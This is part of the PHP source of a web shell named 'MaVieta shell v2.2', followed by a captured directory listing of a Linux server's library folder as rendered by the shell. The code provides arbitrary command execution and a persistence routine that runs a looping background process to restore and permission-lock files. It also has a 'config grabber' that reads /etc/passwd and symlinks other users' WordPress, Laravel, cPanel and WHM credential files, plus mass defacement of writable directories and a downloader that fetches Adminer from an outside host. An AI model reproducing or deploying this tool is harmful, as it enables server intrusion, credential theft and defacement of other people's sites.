    echo "<table class='directory-listing-table'><td>";
    echo '<br><form method="post"><center>
    <div class="input-group" style="width:600px;">
    <span class="input-group-text mb-1">Command :</span>
     <input type="text" class="form-control" name="komen" id="comandnya" value="'.$_POST['komen'].'" placeholder="uname -a" required>
    <button type="submit" name="comandeks" value="execute" class="btn btn-outline-light mb-1">>></button></div></form><br><center>';
    if (isset($_POST['comandeks'])) {
        ekse($_POST['komen'], $serlok);
    }
    echo "</center></td></table><br></center>";
    exit();
} elseif ($_REQUEST[net('about')] == "opet") {
    echo "<table class='directory-listing-table'><thead><td><div style='font-family: Bungee Outline;font-size:24px;'>
    <img class='crot' src='https://i.pinimg.com/564x/84/0e/4c/840e4c57fab2ba6279b377ae8dc333d3.jpg'/> Priv shell uwu edition</div><hr>
    <br> - MaVieta shell v2.2 <br> - Created by MaVieta</td></thead></table>"; exit();
} elseif ($_REQUEST[net('lokfile')] == "opet") {
    echo "<table class='directory-listing-table'><td>
    <h5><i class='fa fa-lock' style='color:#1A9DD2;'></i> Lock file<font class='MaVieta-text' style='font-size:12px;'><i> Linux</i></font></h5><hr style='color:#04FBFF;'>
    <center><form method='post'>
    <div class='input-group' style='width:300px;'>
    <span class='input-group-text mb-2'>Filename :</span>
    <input type='text' name='pile' class='form-control mb-2' placeholder='file.php'/></div><br>
    <button type='sumbit' class='btn btn-outline-light' style='width:120px;' name='submit'>Submit</button> 
    <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a></form><br></td></table>";
    if (isset($_POST['submit'])) {
        if (empty($_POST['pile'])) {
            echo "<br><table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center>The File field is required</center></font></td></table>";
        } else {
        $filez = $_POST['pile'];
        $tempe = "/tmp";
        if (file_exists($tempe.'/'.md5($serlok. $filez.'-xMaVieta').MaVieta_ex($filez).'xhand.Lock') && file_exists($tempe . '/'.MaVieta_ex($filez).'-xopet')) {
            cmd('rm -rf '.$tempe.'/'.md5($serlok. $filez.'-xopet').MaVieta_ex($filez).'xMaVieta.Lock', $serlok);
            cmd('rm -rf '.$tempe.'/'.md5($serlok. $filez.'-xMaVieta').MaVieta_ex($filez).'xhand.Lock', $serlok);
            }
            cmd("cp $filez ".$tempe."/".md5($serlok. $filez.'-xopet').MaVieta_ex($filez).'xMaVieta.Lock', $serlok);
            @chmod($filez, 0444);
            $content = '<?php
    $tmp = "/tmp";
    $fileperm = MaVieta_perm("'.$filez.'");
    MaVieta_cmd("chmod 444 '.$filez.'");
    while (True) {
        if (!file_exists("'.$filez.'")) {
            $var = base64_encode(file_get_contents($tmp . "/'.md5($serlok. $filez.'-xopet').MaVieta_ex($filez).'xMaVieta.Lock"));
            FiLe_pUt_ConTentS("'.$filez.'", base64_decode($var));
        }
        if ($fileperm != "0444"){
            MaVieta_cmd("chmod 444 '.$filez.'");
        }
    }
    function MaVieta_cmd($value)
    {
        if (function_exists("system")) {
            sYsTem($value);
        } else if (function_exists("shell_exec")) {
            return ShEll_eXeC($value);
        } else if (function_exists("exec")) {
            return ExEc($value);
        } else if (function_exists("passthru")) {
            return pAsSThRu($value);
        }
    }
    function MaVieta_perm($filez){
        return substr(sprintf("%o", fileperms($filez)), -4);
    }';
    $content = file_put_contents($tempe. "/" .md5($serlok. $filez.'-xMaVieta'). MaVieta_ex($filez).'xhand.Lock', $content);
    if ($content) {
        echo "<table class='directory-listing-table' style='border-color:lime;'><td>Locked => <font color='lime'>$filez</font></td></table>";
        cmd('php '. $tempe . '/' .md5($serlok. $filez.'-xMaVieta').MaVieta_ex($filez).'"xhand.Lock" > /dev/null 2>/dev/null &', $serlok);
    } else {
        echo "<table class='directory-listing-table' style='border-color:red;'><td><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Can't lock $filez</font></td></table>";
            }
        }
    }exit();
} elseif ($_GET[net('resetcp')] == "opet") {
echo "<table class='directory-listing-table'><td>
<h5>Coming Soon</h5><hr></td></table><br>";exit();
} elseif ($_GET[net('hashiden')] == "opet") {
 echo "<table class='directory-listing-table'><td>
<h5>Hash Identifier</h5>Identify and detect unknown hashes using this tool.<hr>
<form method='POST'>
<div class='input-group' style='width:650px;'>
<span class='input-group-text mb-2'>Your hash :</span>
<input type='text' name='hash' class='form-control mb-2' placeholder='write here'></div><br>
<button type='submit' name='submit' class='btn btn-outline-light'>Submit & identify</button>
 <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light'>Back</a></form></td></table><br>";
if (isset($_POST['submit'])) {
    if (empty($_POST['hash'])) {
        echo "<table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> The Hashes field is required</font></center></td></table>";
    } else {
function identify($hash) {
$algorithms = [
'<font color="lime">MD5' => '/^[a-f0-9]{32}$/i',
'<font color="lime">SHA1' => '/^[a-f0-9]{40}$/i',
'<font color="lime">SHA224, Keccak-224' => '/^[a-f0-9]{56}$/i',
'<font color="lime">SHA256' => '/^[a-f0-9]{64}$/i',
'<font color="lime">SHA512' => '/^[a-f0-9]{128}$/i',
'<font color="lime">Bcrypt, Blowfish(Unix)' => '/^\$2y\$[0-9]{2}\$[A-Za-z0-9\.\/]{53}$/',
'<font color="lime">Argon2i' => '/^\$argon2i\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/',
'<font color="lime">Argon2id' => '/^\$argon2id\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/'];
    foreach ($algorithms as $name => $pattern) {
        if (preg_match($pattern, $hash)) {
            return $name;
        }
    }
    return '<font color="red">Could not identify / Tidak dapat mengidentifikasi</font>';
}
$hashes = [$_POST['hash']];
echo "<table class='directory-listing-table'><td>";
foreach ($hashes as $hash) {
    echo "
    Hash : <font color='lime'>$hash\n</font>";
    echo "<br> Algorithms : " .identify($hash). "\n\n</font></td></table>";
            }
        }
    } exit();
} elseif ($_GET[net('grab_config')] == "opet") {
@ini_set('max_execution_time',0); 
@ini_set('display_errors', 0); 
@ini_set('file_uploads',1);
echo '<table class="directory-listing-table"><thead><td>
<center>Config Grabber<br><br><form method="POST"><textarea cols="100" name="passwd"  rows="25">'; 
$uSr=file("/etc/passwd"); 
foreach($uSr as $usrr) { 
$str=explode(":",$usrr); echo $str[0]."\n"; } 
echo'</textarea><br>
<input type="hidden" class="input" name="folfig" value="MaVietacfg"/><br>
<select class="form-select form-select-sm" aria-label=".form-select-lg example" style="width:150px;">
<option>select menu</option>
<option title="type txt" value=".txt">.txt</option>
<option title="type php" value=".php">.php</option>
<option title="type shtml" value=".shtml">.shtml</option>
<option title="type ini" value=".ini">.ini</option>
<option title="type html" value=".html">.html</option></select><br>
<input name="conf" style="width:100px;" class="btn btn-outline-light" value="submit" type="submit">
</td></thead></table></form></center><br>';
} if(isset($_POST['conf'])) {
$v = "var";
$folfig = $_POST['folfig']; $type = $_POST['type'];
@mkdir($folfig, 0755); 
@chdir($folfig);
$htaccess="
Options Indexes FollowSymLinks
\nDirectoryIndex .my.cnf
\nAddType txt .php
\nAddType txt .my.cnf
\nAddType txt .accesshash
\nAddHandler txt .php
\nAddHandler txt .cnf
\nAddHandler txt .accesshash
";
file_put_contents(".htaccess",$htaccess,FILE_APPEND);
$passwd=explode("\n",$_POST["passwd"]);
foreach($passwd as $pwd){ $user=trim($pwd);
@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
@symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
@symlink('/home/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wp1.txt');
@symlink('/home/'.$user.'/htdocs/wp-config.php',$user.'-Wp-htdocs.txt');
@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wp2.txt');
@symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'-Wp3.txt');
@symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-WpHm1.txt');
@symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-WpHm2.txt');
@symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-WpHm3.txt');
@symlink('/var/www/html/wp-config.php',$v.'-wp1.txt');
@symlink('/home/'.$user.'/public_html/.env',$user.'-Laravel1.txt');
@symlink('/home/'.$user.'/public_html/web/.env',$user.'-Laravel2.txt');
@symlink('/home/'.$user.'/public_html/public/.env',$user.'-Laravel3.txt');
@symlink('/var/www/html/.env',$v.'-LaravelV.txt');
@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
@symlink('/home/'.$user.'/public_html/html/configuration.php',$user.'-Joomla2.txt');
@symlink('/home/'.$user.'/public_html/web/configuration.php',$user.'-Joomla3.txt');
@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
@symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
@symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
@symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
@symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
@symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
@symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
@symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-Magento.txt');
@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
@symlink('/home/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter.txt');
@symlink('/home/'.$user.'/public_html/web/application/config/database.php',$user.'-CodeIgniterH.txt');
@symlink('/home1/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter1.txt');
@symlink('/home2/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter2.txt');
@symlink('/home3/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter3.txt');
@symlink('/home/'.$user.'/.my.cnf',$user.'-cpanel.txt');
@symlink('/home/'.$user.'/.accesshash',$user.'-whm.txt');
@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-opencart.txt');
@symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-mangento.txt');
echo '<table class="directory-listing-table"><thead><td><center>Done => <a href='.$folfig.' target="_blank" class="button">Click Here</a></center></td></thead></table><br>';
    }exit();
} elseif ($_REQUEST[net('scanshell')] == "opet") {
    echo "<center><table class='directory-listing-table'><td>
    <form method='post'>
    <h5><i class='fa-solid fa-newspaper'></i> Backdoors Scanning</font></h5><hr>
    *note : Jika resultnya kosong berarti tidak ditemukan/ekstensi nya di isi dengan benar
    <div class='input-group mb-2' style='width:350px;'>
    <span class='input-group-text mb-1'>Extension :</span>
    <input type='text' class='form-control' name='ext' placeholder='ex : php, phar, shtml, phtml'></div>
    <div class='input-group mb-2' style='width:550px;'>
    <span class='input-group-text mb-1'>Directory :</span>
    <input type='text' class='form-control' name='peth' value='$serlok'></div>
    <button type='submit' class='btn btn-outline-light' name='submit' style='width:120px;'>Submit</button> 
    <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a>
    </form></td></table><br>";
    if(isset($_POST['submit'])) {
        function scan_directory($dir) {
    $ext = $_POST['ext'];
    $rdi = new RecursiveDirectoryIterator($dir);
    echo "<table class='directory-listing-table'><td>";
    foreach (new RecursiveIteratorIterator($rdi) as $filename => $file) {
        if (pathinfo($filename, PATHINFO_EXTENSION) == $ext) {
            $content = file_get_contents($filename);
            if (preg_match('/(eval|base64_decode|str_rot13|mass_deface|addrdp|@exec|@passthru|@chmod|#exec|deface|command|{IFS}|shell_exec|SERVER_SOFTWARE|wget|@get_current_user|@getmygid|htmlspecialchars_decode|B374k|@getmygid|hacked|exe_root|xploit|Disable_Function|backdoor|backconnect|gecko-select|php_uname|Alfa-Team|ALFA_DATA|MARIJUANA|blackeagleteam|IndoSec|getHostByName|alfashell|php-obfuscator|gacor|slot-gacor|slot88|featureShell|move_upload_file|upload)\s*\(/i', $content)) {
                echo "<pre>Found : <font color='lime'>$filename</font> => <font color='orange'>Detected</font> <a href='?viewfile=$filename&path=".$_GET['path']."/$rdi' target='_blank'><i>view</i></a></pre>\n";
            }
        }
    } 
} 
$cek = $_POST['peth'];
if ($cek) {
scan_directory($cek);
echo "<font color='aqua'>Scan Completed..!!</font></td></table><br>";
        } 
    } exit();
} elseif ($_REQUEST[net('massdef')] == "opet") {
    function sabun_massal($serlok,$namafile,$isi_script) {
        if(is_writable($serlok)) {
            $dira = scandir($serlok);
            foreach($dira as $dirb) {
                $dirc = "$serlok/$dirb";
                $lokasi = $dirc.'/'.$namafile;
                if($dirb === '.') {
                    file_put_contents($lokasi, $isi_script);
                } elseif($dirb === '..') {
                    file_put_contents($lokasi, $isi_script);
                } else {
                    if(is_dir($dirc)) {
                        if(is_writable($dirc)) {
                            echo "[<font color=lime>DONE</font>] $serlok<br>";
                            file_put_contents($lokasi, $isi_script);
                            $idx = sabun_massal($dirc,$namafile,$isi_script);
                        }
                    }
                }
            }
        }
    }
    function sabun_biasa($serlok,$namafile,$isi_script) {
        if(is_writable($serlok)) {
            $dira = scandir($serlok);
            foreach($dira as $dirb) {
                $dirc = "$serlok/$dirb";
                $lokasi = $dirc.'/'.$namafile;
                if($dirb === '.') {
                    file_put_contents($lokasi, $isi_script);
                } elseif($dirb === '..') {
                    file_put_contents($lokasi, $isi_script);
                } else {
                    if(is_dir($dirc)) {
                        if(is_writable($dirc)) {
                            echo " http://$dirb/$namafile<br>";
                            file_put_contents($lokasi, $isi_script);
                        }
                    }
                }
            }
        }
    }
    if($_POST['start']) {
        if($_POST['tipe_sabun'] == 'mahal') {
            echo "<table class='directory-listing-table'><td>";
            sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
            echo "</td></table></div>";
        } elseif($_POST['tipe_sabun'] == 'murah') {
            echo "<table class='directory-listing-table'><td>";
            sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
            echo "</td></table></div>";
        }
    } else {
    echo "<table class='directory-listing-table'><td>";
    echo "<form method='post'>
    <div class='form-check-inline mb-2'>
    <input type='radio' name='tipe_sabun' id='biasa' class='form-check-input' value='murah' checked>
    <label class='form-check-label' for='inlineRadio1'>Biasa</label></div>
    <div class='form-check form-check-inline'>
    <input type='radio' name='tipe_sabun' class='form-check-input' value='mahal'>
    <label class='form-check-label' for='inlineRadio2'>Massal</label></div>
    <div class='input-group' style='width:430px;'>
    <span class='input-group-text mb-1'>Files :</span>
    <input type='text' name='d_file' class='form-control' placeholder='file.html'></div>
    <div class='input-group' style='width:750px;'>
    <span class='input-group-text mb-1'>Path :</span>
    <input type='text' name='d_dir' class='form-control' value='$serlok'></div>
    <textarea name='script' class='form-control' style='width: 750px; height: 300px;' placeholder='Hello Word!'></textarea><br>
    <button type='submit' name='start' value='start' class='btn btn-outline-light' style='width: 300px;'>submit</button> 
    <a href='?path=$serlok&".net('tool')."=opet' class='btn btn-outline-light' style='width: 300px;'>Back</a>
    </form></td></table>";
    }exit();
} elseif ($_REQUEST[net('ner')] == "opet") {
    function crot($url){
        $MaVieta = curl_init($url);
        curl_setopt($MaVieta, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($MaVieta, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($MaVieta, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($MaVieta, CURLOPT_HEADER, 0);
        return curl_exec($MaVieta);
        curl_close($MaVieta);
    } 
        echo "<table class='directory-listing-table'><td><h5><i class='fa fa-database' aria-hidden='true'></i> Adminer<font class='MaVieta-text' style='font-size:12px;'><i> v4.8.1</i></font></h5><hr><center>
    <form method='POST'>
    <div class='input-group' style='width:300px;'>
    <span class='input-group-text mb-2'>Filename :</span>
    <input type='text' placeholder='adminer.php' class='form-control mb-2' name='miner'></div><br>
        <button type='sumbit' class='btn btn-outline-light' name='gass' style='width:120px;'>Submit</button> 
        <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a></form></td></table><br>";
    if(isset($_POST['gass'])) {
        if (empty($_POST['miner'])) {
            echo "<table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Input field is required<center></font></td></table>";
        } else {
    $check = $serlok."/".$_POST['miner'];
    $result = str_replace($_SERVER['DOCUMENT_ROOT'], $web."",$check);
    $content = crot('https://raw.githubusercontent.com/bellpwn/netxploit/main/adminer.php');
    $open = fopen($check, 'w');
    fwrite($open, $content);
    fclose($open);
    if (file_exists($check)) {
        echo "<table class='directory-listing-table' style='border-color:lime;'><td>Adminer<font color='lime'> : $check </font><br>Link : <a href='".$result."' target='_blank'><i>$result</i></a></td></table>";
    } else {
        echo "<table class='directory-listing-table' style='border-color:red;'><td><font color='red'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to create adminer..!!</center></font></td></table>";
                    }
                }
        }exit();
} elseif ($_REQUEST[net('buatfile')] == "opet") {
    function createfile(){
        $pat = $_GET['path'];
        $nama_file = $_POST['nama_file'];
        $isi_file = $_POST['isi_file'];
        $handle = fopen("$pat/$nama_file", 'w');
        $files = $_GET['path']."/".$nama_file;
        $asu = str_replace($_SERVER['DOCUMENT_ROOT'], $web. "", $files);
        if (fwrite($handle, $isi_file)) {
            echo '<table class="directory-listing-table" style="border-color:lime;"><td>Created => <font color="lime">'.$pat.'/'.$nama_file.'<br></font>Link : <a href="'.$asu.'" target="_blank"><font color="aqua"><i>Click here</i></a></font></td></table>';
        } else {
            echo '<table class="directory-listing-table" style="border-color:red;"><td><font color=red><i class="fa fa-exclamation-triangle" aria-hidden="true"></i> Failed to create file..!!</font></script></td></table>';
        }
    } if(!isset($_POST['bikin'])) {
        echo "<center><table class='directory-listing-table'><td width='12%''>
    <form method='POST'>
        <input type='text' value='file.php' placeholder='Nama File' style='width: 525px;' name='nama_file' autocomplete='off'><br><br>
        <textarea name='isi_file' rows='20' cols='100' placeholder='Hello World!'></textarea><br>
        <button type='sumbit' class='btn btn-outline-light' style='width:200px; height:36px;' height:30;' name='bikin'>CREATE</button> 
        <a href='?path=".$serlok."' class='btn btn-outline-light'>Back</a><br>
    </form></center>";
        } else {
            createfile();
        }exit();
} elseif ($_GET[net('buatfolder')] == "opet") {
      function createDirectory() {
        if (empty($_POST['add'])) {
        echo '<table class="directory-listing-table" style="border-color:orange;"><td><font color="orange">Folder field is required</font> [<a href="?path='.$_GET['path'].'&'.net("buatfolder").'=opet"><i class="fa-solid fa-folder-plus" aria-hidden="true"></i>Create again</a>]</td></table>';
        } else {
        $add = $_POST["add"];
        $MaVieta = mkdir($_GET['path']."/".$add);
        if ($MaVieta == true) {
            echo "<table class='directory-listing-table' style='border-color:lime;'><td>Created =><font color=lime> ".$_GET['path']."/</font><font color='orange'>$add</font><br>
            <a href='?path=".$_GET['path']."/$add'><u>Click Here</u></a></td></table>";
    } else {
            echo "<table class='directory-listing-table' style='border-color:red;'><td><font color=red><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to create folder : $add</font></td></table>";
                }
        }
}
        if (!isset($_POST['submit'])) {
            echo '<table class="directory-listing-table"><td>
        <form action="" method = "POST"><h5><i class="fa fa-folder-plus"></i> Create Folder</h5><hr><center>
        <div style="width:300px;">
         <input type="text" class="form-control" placeholder="Folder Name" name="add" id="add"/><br></div>
        <button type="submit" class="btn btn-outline-light" name="submit" value="Create directory" style="width:120px;">Create</button> 
        <a href="?path='.$serlok.'" class="btn btn-outline-light" style="width:120px;">Back</a><br><br></form></td></table>';
        } else {
            createDirectory();
        }exit();
} elseif ($_REQUEST[net('info')] == "opet") {
    echo "<table class='directory-listing-table' align='center'>
    <div id='content'><tr><td>";
    echo "Server : <font color=orang>".$_SERVER['HTTP_HOST']."</font><br>";
    echo "Server IP : <font color=orange>".ipserv()."</font>  <br> Your IP : <font color=orange>".$_SERVER['REMOTE_ADDR']."</font><br>";
    echo "Web Server : <font color='orange'>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
    echo "System : <font color='orange'>".php_uname()."</font><br>";
    echo "User : <font color='orange'>".@get_current_user()." </font>( <font color='orange'>".@getmyuid()."</font>)<br>";
    echo "PHP Version : <font color='orange'>".@phpversion()." </font>=><font color='orange'> ".php_sapi_name()."</font><br>";
    echo "</tr></td><tr><td>Disable Function : ".$disf."</font>";
    echo "</div></tr></td><tr><td>";
    echo "<hr>Orecle : ";
if (function_exists('oci_connect')) {
        echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";

    echo " | SSH2 : ";
}

if (function_exists('ssh2_connect')) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";

    echo " | MySQL : ";
}
if (function_exists("mysql_connect")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | cURL : ";
if (function_exists("curl_init")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | WGET : ";
if (file_exists("/usr/bin/wget")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | Perl : ";
if (file_exists("/usr/bin/perl")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | Python : ";
if (file_exists("/usr/bin/python2")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
$pkexec = (@shell_exec("pkexec --version")) ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>";
    echo " | PKEXEC : $pkexec<br><br>";
    echo "</tr></td></table><br>";
    exit();

}


if (!is_readable($serlok)) {
    die("<table class='directory-listing-table'><thead><td><center><font color=orange>This directory is unreadable :(</font></center></td></thead></table>");
}

echo '<table class="table table-dark table-hover" style="box-shadow: 0 0 20px black;width:90%;border-left:1px solid #40BECC;border-right:1px solid #40BECC;border-bottom:1px solid #40BECC;--bs-border-radius:80rem;" align="center">
<thead style="--bs-table-bg:#0D97A5;--bs-table-color:#000;"><tr>
<th><center>Name</center></th>
<th><center>Size</center></th>
<th><center>Last Modified</center></th>
<th><center>Owner</center></th>
<th><center>Permissions</center></th>
<th><center>Actions</center></th>
</tr></thead><center>';
$scd = "\163\143"."\141\156\144"."\151\162";
if(is_readable($serlok)){
            $fetch=$scd($serlok);
            $serlokbos=array();
            $filez=array();
            foreach($fetch as $fols){
                if($fols=='.'||$fols=='..'){
                    continue;
                }
                    $MaVietas=$serlok.'/'.$fols;
                    if(is_dir($MaVietas)){
                        array_push($serlokbos,$fols);
                    }elseif(is_file($MaVietas)){
                        array_push($filez,$fols);
                    }
                }
            }
foreach($serlokbos as $dir){
    echo "<tr>
    <td><i class='fa fa-folder' style='color: #FAA625'></i> <a href=\"?path=".$serlok."/".$dir."\">".$dir."</a></td>
    <td><center>Dir</center></td>
    <td><center>".filedate($serlok."/".$dir)."</center></td>
    <td>".owner($serlok."/".$dir)."</td>
    <td><center>";
    if(is_writable($serlok."/".$dir)) echo '<font color="lime">';
    elseif(!is_readable($serlok."/".$dir)) echo '<font color="red">';
    echo statusnya($serlok."/".$dir);
    if(is_writable($serlok."/".$dir) || !is_readable($serlok."/".$dir)) echo '</font>';

    echo "</center></td>
    <td><center><form method=\"POST\" action=\"?pilihan&path=$serlok\">
    <div class='btn-group me-2' role='group' aria-label='First group'>
    <button type='submit' class='btn btn-outline-secondary badge-action-rename' name='pilih' value='gantinama'>
    <i class='fa fa-pencil' style='color: #fff'></i></button>
    <button type='submit' class='btn btn-outline-secondary badge-action-chmod' name='pilih' value='chmodf'><i class='fa fa-gear' style='color: #06D2D5'></i></button>
    <button type='submit' class='btn btn-outline-secondary badge-action-tanggal' name='pilih' value='chdatef'><i class='fa fa-calendar' style='color: #5654F5'></i></button>
    <button type='submit' class='btn btn-outline-secondary badge-action-delete' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #E53A3A'></i></button></div>
    <input type=\"hidden\" name=\"type\" value=\"dir\">
    <input type=\"hidden\" name=\"name\" value=\"$dir\">
    <input type=\"hidden\" name=\"path\" value=\"$serlok/$dir\">
    </form></center></td>
    </tr>";
}

foreach($filez as $file) {
    if(!is_file("$serlok/$file")) continue;
        $size = filesize("$serlok/$file")/1024;
        $size = round($size,3);
        if($size >= 1024){
        $size = '<font color="aqua">'.round($size/1024,2).'</font> MB';
    } else {
        $size = '<font color="#E6F01C">'.$size.'</font> KB';
    }
echo "<tr>
<td>".cekfile($serlok."/".$file)."
<a href=\"?viewfile=".$serlok."/$file&path=".$serlok."\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>".filedate($serlok."/".$file)."</center></td>
<td>".owner($serlok."/".$file)."</td>
<td><center>";
if(is_writable("$serlok/$file")) echo '<font color="lime">';
elseif(!is_readable("$serlok/$file")) echo '<font color="red">';
echo statusnya("$serlok/$file");
if(is_writable("$serlok/$file") || !is_readable("$serlok/$file")) echo '</font>';
echo "</center></td><td><center>
<form method='post' action='?pilihan&path=$serlok'>
<div class='btn-group' role='group' aria-label='First group'>";
echo gazz($file);
echo "</div><input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$serlok/$file\">
</form></center></td></tr>";
}
echo '</tr></td></table></table>';
author();

function statusnya($file){
$izin = substr(sprintf('%o', fileperms($file)), -4);
return $izin;
}
?>
</body>
</html>
1#@!#!123s

: proc / thread-self / root / usr / lib / x86_64-linux-gnu / 

Name
Size
Last Modified
Owner
Permissions
Actions
ImageMagick-6.9.11
Dir
September 08 2024 4:19:14
root
0755
ImageMagick-6.9.12
Dir
December 23 2025 10:46:09
root
0755
apr-util-1
Dir
December 23 2025 10:45:06
root
0755
audit
Dir
December 23 2025 10:42:13
root
0755
avahi
Dir
December 23 2025 10:45:17
root
0755
bfd-plugins
Dir
December 23 2025 10:45:26
root
0755
cryptsetup
Dir
December 23 2025 10:43:54
root
0755
dhcpcd
Dir
December 23 2025 10:45:00
root
0755
e2fsprogs
Dir
December 23 2025 10:45:37
root
0755
engines-3
Dir
December 23 2025 10:43:52
root
0755
gconv
Dir
December 23 2025 10:42:14
root
0755
gettext
Dir
December 23 2025 10:46:28
root
0755
gio
Dir
December 23 2025 10:45:04
root
0755
girepository-1.0
Dir
December 23 2025 10:45:39
root
0755
glib-2.0
Dir
December 23 2025 10:45:04
root
0755
gprofng
Dir
December 23 2025 10:45:26
root
0755
gstreamer-1.0
Dir
December 23 2025 10:45:03
root
0755
gstreamer1.0
Dir
September 08 2024 4:15:33
root
0755
krb5
Dir
January 20 2021 9:15:31
root
0755
ldscripts
Dir
December 23 2025 10:45:26
root
0755
libfakeroot
Dir
December 23 2025 10:46:33
root
0755
libheif
Dir
December 23 2025 10:45:22
root
0755
lua
Dir
December 23 2025 10:46:58
root
0755
ossl-modules
Dir
December 23 2025 10:43:52
root
0755
packagekit-backend
Dir
December 23 2025 10:44:59
root
0755
perl
Dir
December 23 2025 10:43:38
root
0755
perl-base
Dir
December 23 2025 10:43:38
root
0755
perl5
Dir
December 23 2025 10:43:40
root
0755
pkgconfig
Dir
December 23 2025 10:46:02
root
0755
plymouth
Dir
December 23 2025 10:46:25
root
0755
rsyslog
Dir
December 23 2025 10:46:19
root
0755
sasl2
Dir
December 23 2025 10:46:37
root
0755
security
Dir
December 23 2025 10:45:36
root
0755
systemd
Dir
December 23 2025 10:43:53
root
0755
tc
Dir
December 23 2025 10:45:39
root
0755
traceevent
Dir
December 23 2025 10:46:23
root
0755
xtables
Dir
December 23 2025 10:45:38
root
0755
Mcrt1.o
0.594 KB
September 17 2025 10:55:42
root
0644
Scrt1.o
1.617 KB
September 17 2025 10:55:42
root
0644
crt1.o
1.75 KB
September 17 2025 10:55:42
root
0644
crti.o
1.164 KB
September 17 2025 10:55:42
root
0644
crtn.o
0.742 KB
September 17 2025 10:55:42
root
0644
gcrt1.o
2.477 KB
September 17 2025 10:55:42
root
0644
grcrt1.o
2.203 KB
September 17 2025 10:55:42
root
0644
ld-linux-x86-64.so.2
231.07 KB
September 17 2025 10:55:42
root
0755
libBrokenLocale.a
1.873 KB
September 17 2025 10:55:42
root
0644
libBrokenLocale.so
14.281 KB
September 17 2025 10:55:42
root
0644
libBrokenLocale.so.1
14.281 KB
September 17 2025 10:55:42
root
0644
libICE.so.6
95.688 KB
April 09 2024 12:04:21
root
0644
libICE.so.6.3.0
95.688 KB
April 09 2024 12:04:21
root
0644
libLLVM-18.so
117.51 MB
May 27 2024 4:26:20
root
0644
libLLVM.so.18.1
117.51 MB
May 27 2024 4:26:20
root
0644
libLerc.so.4
534.172 KB
April 09 2024 12:01:10
root
0644
libMagickCore-6.Q16.so.6
2.69 MB
July 20 2024 4:37:45
root
0644
libMagickCore-6.Q16.so.6.0.0
2.69 MB
July 20 2024 4:37:45
root
0644
libMagickCore-6.Q16.so.7
2.68 MB
March 31 2024 9:25:01
root
0644
libMagickCore-6.Q16.so.7.0.0
2.68 MB
March 31 2024 9:25:01
root
0644
libMagickWand-6.Q16.so.6
1.17 MB
July 20 2024 4:37:45
root
0644
libMagickWand-6.Q16.so.6.0.0
1.17 MB
